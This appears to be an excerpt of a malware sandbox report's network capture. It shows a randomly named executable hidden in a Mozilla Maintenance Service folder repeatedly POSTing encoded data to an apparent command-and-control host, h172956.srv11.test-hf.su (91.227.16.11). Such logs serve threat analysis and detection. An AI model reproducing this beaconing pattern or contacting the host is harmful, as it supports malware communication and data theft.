                                                                    Mar 5, 2024 22:27:40.695722103 CET2596OUTData Raw: 54 51 51 5e 5e 5d 55 55 5e 57 5a 51 57 5e 50 58 54 50 54 53 56 59 57 55 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TQQ^^]UU^WZQW^PXTPTSVYWUT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9C/!.' >&&*;?_3(?&9(T5",$&<&Z,)%Z"!Q*
                                                                    Mar 5, 2024 22:27:40.930201054 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.54971391.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:39.713490963 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:27:39.923392057 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:39.923912048 CET2596OUTData Raw: 51 5e 54 58 5e 5a 50 54 5e 57 5a 51 57 5a 50 53 54 51 54 53 56 5d 57 5d 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q^TX^ZPT^WZQWZPSTQTSV]W]T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/"1$#90"X/,1']1906/<"3]$4&28%Z"!Q*%
                                                                    Mar 5, 2024 22:27:40.160717010 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.54971691.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:41.332324982 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:27:41.539086103 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:41.546672106 CET2596OUTData Raw: 54 51 54 5e 5e 59 55 57 5e 57 5a 51 57 5d 50 5b 54 5c 54 5f 56 54 57 5f 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TQT^^YUW^WZQW]P[T\T_VTW_T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9C/.R030%;<2'( '9!Z#!,3X$ %Z:X;9%Z"!Q*9
                                                                    Mar 5, 2024 22:27:41.779422998 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.54971891.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:42.785655975 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:42.997656107 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:43.000134945 CET2596OUTData Raw: 51 5d 54 5d 5e 5b 55 52 5e 57 5a 51 57 5b 50 5f 54 52 54 52 56 5c 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q]T]^[UR^WZQW[P_TRTRV\WTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9;2.U'$%;10 %)#,#5$0<2Z=;%Z"!Q*!
                                                                    Mar 5, 2024 22:27:43.240186930 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.54971991.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:43.897362947 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:44.106301069 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:44.106573105 CET2596OUTData Raw: 54 50 54 59 5b 5e 50 54 5e 57 5a 51 57 5e 50 59 54 5c 54 5a 56 5b 57 5f 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TPTY[^PT^WZQW^PYT\TZV[W_T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9E81$3=Z3%6],.Y'^/]'*,V!?4V67$&?";9%Z"!Q*
                                                                    Mar 5, 2024 22:27:44.340728045 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.54972091.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:45.572776079 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:45.782732010 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:45.782968044 CET1920OUTData Raw: 54 5d 51 5b 5e 5b 50 53 5e 57 5a 51 57 58 50 5b 54 5d 54 5f 56 5b 57 5c 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T]Q[^[PS^WZQWXP[T]T_V[W\T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9/'=]$5&]8<"^3(3290T!?!<38&/=,9%Z"!Q*-
                                                                    Mar 5, 2024 22:27:46.017302990 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.54972291.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:47.591056108 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:47.802783966 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:47.803042889 CET2596OUTData Raw: 54 50 51 5a 5b 5a 55 52 5e 57 5a 51 57 5d 50 58 54 51 54 5f 56 55 57 5c 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TPQZ[ZUR^WZQW]PXTQT_VUW\T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:;.% 5Z$6,2X'<2: U"+!Z 0$7^$,.;%Z"!Q*9
                                                                    Mar 5, 2024 22:27:48.041311026 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.54972591.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:51.240278959 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:51.449037075 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:51.449239969 CET1920OUTData Raw: 54 51 54 51 5b 5a 55 57 5e 57 5a 51 57 5d 50 5d 54 54 54 58 56 59 57 5c 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TQTQ[ZUW^WZQW]P]TTTXVYW\T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:."2U30&3>^,/Y'(%?!<8!,Y0$#^%,[,%Z"!Q*9
                                                                    Mar 5, 2024 22:27:51.683653116 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.54972691.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:51.393934965 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:51.600543022 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:51.600830078 CET2596OUTData Raw: 51 5b 54 5b 5e 5b 55 55 5e 57 5a 51 57 5e 50 5b 54 50 54 58 56 5d 57 5c 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q[T[^[UU^WZQW^P[TPTXV]W\T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9@;2&S%0)'6.-?&\$8'1:,!/86?7$4%,9%Z"!Q*
                                                                    Mar 5, 2024 22:27:51.835338116 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.54972891.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:52.251434088 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:27:52.462318897 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:52.462518930 CET2592OUTData Raw: 54 5f 54 5b 5b 57 50 53 5e 57 5a 51 57 59 50 59 54 54 54 58 56 5d 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T_T[[WPS^WZQWYPYTTTXV]WXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]98W-'3)/)$((2<T#, V!<^0$<&>/%Z"!Q*!
                                                                    Mar 5, 2024 22:27:52.700391054 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.54972991.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:53.072901011 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:53.283679008 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:53.283909082 CET2596OUTData Raw: 54 5f 51 59 5b 5c 50 51 5e 57 5a 51 57 5a 50 5a 54 52 54 53 56 59 57 5f 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T_QY[\PQ^WZQWZPZTRTSVYW_T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/"%$=]'%&];5$;?\&(6<T"<#'&,-;%Z"!Q*%
                                                                    Mar 5, 2024 22:27:53.519001007 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.54973091.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:53.895978928 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:54.104914904 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:54.105109930 CET2592OUTData Raw: 51 5b 54 58 5e 5d 55 55 5e 57 5a 51 57 59 50 58 54 55 54 52 56 5f 57 5b 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q[TX^]UU^WZQWYPXTUTRV_W[T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:;2V$U9^3%";?53;'[2:85"Z#]34$&/=8)%Z"!Q*%
                                                                    Mar 5, 2024 22:27:54.338901997 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.54973191.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:54.722373962 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:54.938949108 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:54.939342022 CET2596OUTData Raw: 54 50 51 5b 5b 5e 55 57 5e 57 5a 51 57 58 50 58 54 55 54 53 56 59 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TPQ[[^UW^WZQWXPXTUTSVYWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9;!-'3=]069;Y1$^;Z2,"<T6/3_341<&/)%Z"!Q*-
                                                                    Mar 5, 2024 22:27:55.174726009 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.54973291.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:55.528637886 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:55.740523100 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:55.740818977 CET2592OUTData Raw: 51 59 51 5b 5b 57 50 54 5e 57 5a 51 57 59 50 5f 54 52 54 53 56 54 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
